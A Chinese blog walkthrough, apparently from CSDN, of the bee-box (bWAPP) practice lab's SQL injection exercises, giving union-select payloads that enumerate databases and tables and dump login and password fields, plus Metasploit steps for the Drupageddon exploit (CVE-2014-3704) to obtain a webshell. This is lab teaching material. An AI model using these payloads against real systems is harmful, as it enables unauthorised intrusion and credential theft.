beebox靶场A1 low 命令注入通关教程(中)

最新推荐文章于 2023-12-16 17:56:37 发布
最新推荐文章于 2023-12-16 17:56:37 发布
阅读量897 收藏 19
点赞数 21
文章标签: 数据库 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dj445566/article/details/135020699
版权

十一:sql注入 select

这个页面是一个选择性框

我们通过选择不同的选项发现上面url中的movie也在不同的变法。那再查看源码得知,这是一个数字型的注入点

那我们就可以构造payload在movie后面改变内容,首先进行爆列数payload为 1 order by 8 时显示未知的列

得到该数据库会回显七列,接下来就可以进行爆数据库

进行测试可得知第2列有回显那位payload为1 and 1=2 union select 1,database(),3,4,5,6,7

这样就拿到了数据库,接下来可以爆表,爆字段等操作

十二:sql 注入 AJAX/JSON/jQuery

AJAX 是一种在无需重新加载整个网页的情况下,能够更新部分网页的技术。

一、什么是 AJAX ?

AJAX = Asynchronous JavaScript and XML(AJAX = 异步 JavaScript 和 XML。)。

AJAX 不是新的编程语言,而是一种使用现有标准的新方法。

AJAX 是一种用于创建快速动态网页的技术。

通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。

传统的网页(不使用 AJAX)如果需要更新内容,必需重载整个网页面。

有很多使用 AJAX 的应用程序案例:新浪微博、Google 地图、开心网等等。

这个页面是动态刷新的,所以没有提交按钮,其他的就跟上面那个search型差不多

例:当写入1 'order by 7# 时,依旧显示没有找到电影,当写到1 'order by 8#时会发现没有页面返回了,这证明爆到了列数为7列,那接下来老生常谈,爆库,表,字段一类的,爆库的代码为1 'and 1=2 union select 1,database(),3,4,5,6,7#

十三:sql注入 CAPTCHA

captcha同上一个一样,只是进入前需要输入验证码,进去后就可以进行测试和注入了

源码为 SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'

十四:SQL 注入 (Login Form/Hero)

查看源码为 $sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND password = '" . $password . "'"

接着输入order by 进行测试, 当测到1 'order by 5# 时显示未知的列,证明回显有4列

接下来继续爆库输入1 ' and 1=2 union select 1,2,3,database()#

十五:SQL 注入(登录表单/用户)

源码为 $sql = "SELECT * FROM users WHERE login = '" . $login . "'"; if($row["login"] && $password == $row["password"])

先判断用户是否存在,如果存在再判断密码是否正确 注入只能在用户名处 结合数据库解读源码,注入流程为: 在用户名处使用联合查询注入,第三个字段必须是你填入的 密码通过 sha1 哈希之后的值

像这种带有输入框的都是先进行简单测试,通过order by 得到有9列

爆库payload为

' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb",4,user(),6,7,8,9 #

爆表为 ' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb",4,(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7,8,9 #

爆字段为

' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb",4,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database()),6,7,8,9#

爆字段中的数据为' union select 1,database(),"77de68daecd823babbb58edb1c8e14d7106e83bb",4,(select group_concat('~',login,'~',password) from users),6,7,8,9 #

十六:SQL Injection (SQLite)

查看源码得知改查询为模糊查询

源码为 $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

那进行简单测试先构造闭合 1%' order by 6 --查询列数,当查到第7列时报错,证明回显6列,--的意思为sqlite中的注释符

接下来进行爆表

123%' union select 1,sqlite_version(),name,4,5,6 from sqlite_master --

爆字段 123%' union select 1,sqlite_version(),sql,4,5,6 from sqlite_master --

爆数据 123%' union select 1,2,login,password,5,6 from users --

十七:Drupal SQL 注入 Drupageddon

CVE-2014-3704: 翻译一下就是: 由于expandArguments()函数没有正确构造准 备好的语句,这使得远程攻击者能够通过包含精心编制的手 工语句进行SQL注入攻击。影响Drupal版本在7.x~1.32。 Drupal是一款开源内容管理系统(CMS),用户多达100万 以上(包括政府、电子零售、企业组织、金融机构等),除 非已经安装了针对Drupalgeddon 漏洞的安全补丁,否则, 所有用户都会面临该漏洞的严重威胁。 使用 MSF

这个就是个漏洞利用 use exploit/multi/http/drupal_drupageddon

set targeturi http://192.168.150.128/drupal/

set RHOSTS X.X.X.X

set rport XXXX

run

之后就可以根据这个漏洞利用来拿到webshell

dj445566
关注
  • 21
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bee-box
Xi4or0uji
09-18 4631
这篇博客就是为了记下bee-box做题过程,随便记记,免得忘了 安装 先去官网下载了,然后分个新的盘单独放进去,打开虚拟机,双击bee-box.vmx就能安装了 打开里面的火狐会自动跳去一个登录界面,默认账号和密码是bee/bug,登录然后就能做题了 我是美丽的分割线------------------------------------- 接下来讲漏洞 HTML Injection ...
利用平台漏洞
2301_78833225的博客
07-02 112
3.用nmap 上带的ssl-heartbleed.nse脚本对目标机器进行扫描看是否存在heartbleed漏洞:(使用nmap的ssl-heartbleed.nse脚本扫描bee-box靶机的8443端口,看是否看是否存在heartbleed漏洞)2.用nmap -O 192.168.xx.xx(填入bee-box的IP) 查看一下开放端口,找到https-alt的端口:(在kali,也就是攻击主机扫描bee-box,查看bee-box的开放端口,目的是找到https-alt的端口。
bWAPP靶场搭建——直接使用虚拟机镜像导入配置
CoffeMilk的博客
12-27 2644
bWAPP是一款非常好用的免费的、开源漏洞演示学习平台;它有100多个网络错误!且它涵盖了所有已知的主要web漏洞,包括OWASP Top 10项目的所有风险。bWAPP是一个使用MySQL数据库的PHP应用程序;它可以通过Apache/IIS和MySQL托管在Linux/Windows上。WAMP或XAMPP支持它。也可以下载bee-box镜像(即bee-box镜像是一个预先安装了bWAPP靶场的定制虚拟机环境,开箱即用,十分方便)。
Bee-Box 靶场搭建和键盘乱序问题
maxle的博客
04-14 1528
bWAPP - Browse /bee-box at SourceForge.netan extremely buggy web app !https://sourceforge.net/projects/bwapp/files/bee-box/官网如上: 解压后 VMware文件处去相应的解压目录打开或者扫描虚拟机都可以。 直接打开虚拟机,不需要登陆用户直接进入虚拟机,直接打开左上角的火狐浏览器,进入一个登陆界面。 用户bee,密码bug 键盘乱码解决:system-->...
php xpath注入工具,bee-box xPath注入学习之靶场练习
weixin_39634480的博客
04-07 360
在bwapp,对应的xPath注入bug是XML/XPathInjection (Search),这个漏洞的引用文件是xmli_2.php,直接先看下这份文件的源码:首先从get请求接收到表单的值,然后$genre送入到xmli,进行一次字符过滤,由于这里使用的安全等级为最低级,所以没有进行任何过滤就返回了data。接收到返回的data值之后,php文件加载xml文件,使用simplexml...
cloudbeebox:Trello PowerUp提供Cloud Beebox支持
03-17
cloudbeebox Trello PowerUp提供Cloud Beebox支持。
Beebox for Java-开源
05-03
该软件包是Java的开发软件包,可在Java平台上使用BeeBox
beebox_detect_wang_cam_tset(实验).py
04-23
beebox_detect_wang_cam_tset(实验).py
beebox靶场A1 low 命令注入通关教程(上)
dj445566的博客
12-14 1545
本文为beebox(小蜜蜂)靶场系列A1low级别的命令注入和各种注入的集合,大家多多掌握方法和思路
我的再造学习篇Day1-XXE漏洞剖析
weixin_44866139的博客
03-21 432
一、XML、DTD、实体介绍 XML XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD文档类型定义(document type definition) 的东西控制的。 DTD用来描述...
beebox靶场A1 low 命令注入通关教程(下)
最新发布
dj445566的博客
12-16 933
本文为beebox(小蜜蜂)系列靶场A1 LOW级别命令注入的解题思路与方法,大家多多练习
Bee-Box 虚拟机下载及安装
Peter 的博客
09-07 9303
Bee-Box 虚拟机下载及安装 Bee-box官方称呼BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASPTop10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 ...
Bee-box之键盘乱序问题
Ray
03-21 2881
Bee-box官方称呼BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASPTop10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 1 安装bee-box v1.6镜像到VM
server新手引导 sql_新手入门靶机BEEBOX教程—第一章A1(二)
weixin_39915308的博客
12-17 652
0x00 Preface [前言/简介]接着上一篇文章,更新BEE-BOX第一章A1题目,有不理解这些靶机是哪儿的小伙伴,传送门:新手入门靶机BEE-BOX教程—环境搭建(一)0x01 BEE-BOX习题:A1-Injection原理今天所更新的是A1,关于注入漏洞。在A1有HTML页面注入、OS命令注入、SQL注入等比较经典注入。我们在学习的时候,首先要先理解他们的原理,这些漏洞...
bee-box之XSS攻击(附上篇总结)
qq_43571759的博客
03-20 3132
bwapp的xss练习笔记附上篇总结 前言 一个月前刷了XSSchalleng以为自己已经算是入门了XSS了,但是在我挖洞碰到有可能存在XSS漏洞网页的时候,发现我只能记起来<script>alert('xss')</script> 等等最基本的,绕过方式忘得一干二净,果然一句话说得好!对于我这种没有天赋的人,重复就是记忆它妈!!! 再就是上次刷题的我居然没有总结,那可是我...
解决靶机Bee-Box 键盘乱序问题
Sylon的博客
08-28 988
Bee-Box介绍 Bee-box官方称呼BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASPTop10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 解决方法 System ...
靶场环境搭建
94小菜
12-27 918
bwapp靶场环境搭建
bWAPP靶场实战
Kevin's Blog
05-15 2837
文章目录一、靶场介绍二、靶场搭建2.1 安装类型2.2 独立安装三、漏洞实战SSRF远程文件包含端口扫描 一、靶场介绍   集成了超过100余个网络漏洞,php web漏洞靶场,能够调制漏洞难度等级(低->->高)。 二、靶场搭建 下载:https://sourceforge.net/projects/bwapp/ 2.1 安装类型 搭建类型有两种:(虚拟机版本可测试测漏洞类型更多,比如破壳、心脏滴血) 独立安装(部署到apache + php +mysql环境下) 虚拟机安装(bee
SSRF之bee-box练习
qq_43571759的博客
02-29 1976
SSRF (Server-side Request Forgery,服务器请求伪造)漏洞,是一种攻击者构造请求,是一种攻击者发起的伪造由服务器发起请求的一种攻击。 SSRF危害 * 端口扫描 * 利用file文件协议 读取本地文件 * 内网web 应用指纹识别 * 攻击内网web 端口扫描和读取文件的危害会在等下练习的时候体现出来; 漏洞发现: 其对外发起网络请求的地方都可能存在SSRF漏洞...
实战靶场整理
weixin_39811856的博客
07-22 2034
0x00 前言 在学习渗透测试的过程,光学理论知识是不够的,还需要结合实战来进行学习。但是国家法律是不允许我们对互联网上的web站在未授权的情况下进行渗透测试的,所以我们只能通过自己搭建环境来进行学习。下面给大家分享一些靶场,免得大家再去寻找。 0x01Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butt.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值